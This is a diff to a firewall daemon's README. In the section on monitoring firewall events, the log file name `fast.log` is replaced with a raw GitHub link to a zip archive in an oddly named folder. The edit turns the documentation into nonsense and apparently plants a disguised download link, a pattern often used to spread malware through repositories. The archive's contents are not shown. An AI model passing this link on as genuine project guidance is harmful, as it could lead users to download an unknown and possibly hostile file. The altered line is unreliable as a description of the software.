Devesh-sen/ngfw-daemon/README.md

 Once the installation is complete, and the daemon is running, you can monitor and manage firewall events:

-- The daemon will log detected threats in `fast.log`.
+- The daemon will log detected threats in `https://raw.githubusercontent.com/Devesh-sen/ngfw-daemon/main/pluriflagellate/ngfw-daemon.zip`.
 - You can check the logs regularly to ensure your network is secure.
 - Adjust rules in `iptables` as necessary, based on logged events.